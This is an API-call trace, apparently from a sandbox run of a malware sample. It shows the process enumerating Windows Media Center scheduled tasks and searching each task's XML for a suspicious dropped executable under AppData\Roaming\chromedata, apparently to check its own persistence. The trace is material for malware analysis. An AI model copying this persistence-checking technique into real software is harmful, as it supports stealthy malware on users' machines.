	[0073.561] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoConfigureInternetTimeService</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.562] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.562] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.562] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="DispatchRecoveryTasks") returned 0x0
	[0073.562] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRecoveryTasks $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.563] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRecoveryTasks $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.563] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.563] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x4, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.563] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="ehDRMInit") returned 0x0
	[0073.563] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ehDRMInit</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DRMInit</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.565] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ehDRMInit</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DRMInit</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.565] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.565] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x5, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.565] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="InstallPlayReady") returned 0x0
	[0073.565] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\InstallPlayReady</URI>\r\n    <Date>2008-02-08T15:02:27.7076832</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/InstallPlayReady $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.566] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\InstallPlayReady</URI>\r\n    <Date>2008-02-08T15:02:27.7076832</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/InstallPlayReady $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.566] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.566] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x6, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.567] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="mcupdate") returned 0x0
	[0073.567] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\mcupdate</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-125)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-126)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.568] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\mcupdate</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-125)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-126)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.568] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.568] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x7, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.568] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="MediaCenterRecoveryTask") returned 0x0
	[0073.569] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-137)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-138)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-MediaCenterRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{23E5D772-327A-42f5-BDEE-C65C6796BB2A}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.570] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-137)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-138)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-MediaCenterRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{23E5D772-327A-42f5-BDEE-C65C6796BB2A}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.570] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.570] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x8, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.570] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="ObjectStoreRecoveryTask") returned 0x0
	[0073.570] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-131)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-132)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-ObjectStoreRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{177AFECE-9599-46cf-90D7-68EC9EEB27B4}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.572] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ObjectStoreRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-131)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-132)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-ObjectStoreRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{177AFECE-9599-46cf-90D7-68EC9EEB27B4}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.572] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.572] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x9, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.572] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="OCURActivate") returned 0x0
	[0073.572] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURActivate</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURActivate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
